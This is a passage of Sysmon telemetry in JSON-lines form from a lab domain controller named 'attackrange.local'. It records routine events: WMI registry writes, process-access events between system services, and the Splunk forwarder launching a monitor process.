05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\xeniface.sys[XENIFACEMOF]","Details":"LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refresh\r\nDetails: DWORD (0x00000000)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refresh","Details":"DWORD (0x00000000)","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed\r\nDetails: DWORD (0x00000001)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed","Details":"DWORD (0x00000001)","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:48.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 640\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+b954|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:48.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"640","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+b954|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:48.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nSourceProcessId: 996\r\nSourceThreadId: 640\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+ba7a|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:48.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","SourceProcessId":"996","SourceThreadId":"640","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+ba7a|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nProcessGuid: {A837DB8D-02BA-5F25-0000-0010C0090600}\r\nProcessId: 1164\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","ProcessGuid":"{A837DB8D-02BA-5F25-0000-0010C0090600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BA-5F25-0000-0010C0090600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BA-5F25-0000-0010C0090600}","TargetProcessId":"1164","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BA-5F25-0000-0010C0090600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BA-5F25-0000-0010C0090600}","TargetProcessId":"1164","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 